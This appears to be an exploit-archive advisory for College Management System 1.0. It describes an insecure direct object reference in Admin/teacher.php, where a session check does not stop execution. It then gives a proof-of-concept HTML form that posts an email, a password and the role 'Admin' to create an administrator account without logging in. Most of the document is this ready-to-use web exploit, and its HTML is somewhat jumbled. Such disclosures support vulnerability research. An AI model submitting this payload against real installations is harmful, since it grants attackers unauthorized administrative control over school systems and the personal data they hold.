College Management System 1.0 Insecure Direct Object Reference

College Management System 1.0 suffers from an insecure direct object reference that allows a user to add an administrator without any authentication.

MD5 | 4b73bc20560b30957f9bb998b45e91f6

# Exploit Title: college management system - Add admin (Unauthenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Kali Linux

in Admin/teacher.php in line 1

if (!$_SESSION["LoginAdmin"])
require_once "../connection/connection.php";

in Admin/teacher.php

line 23 :$email=$_POST["email"];
line 63 :$password=$_POST['password'];
line 65 :$role=$_POST['role'];

role Admin,Teacher,Student


<html lang="en">
<title>ADD Amin</title>
<body class="login-background">
<!doctype html>
<html lang="en">
<meta charset="utf-8">

<!-- css style goes here -->
<link rel="stylesheet" href="" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">

<!-- css style go to end here -->
<link rel="stylesheet" href="">

<div class="row m-3">
<div class="col-md-12">
<form action="" method="POST" enctype="multipart/form-data">
<div class="row mt-3">

<input type="text" name="email" value="[email protected]">
<input type="text" name="password" value="123456">
<input type="text" name="role" value="Admin">
<input type="text" name="account" value="Activate">
<div class="modal-footer">
<input type="submit" class="btn btn-primary px-5" name="btn_save">

Related Posts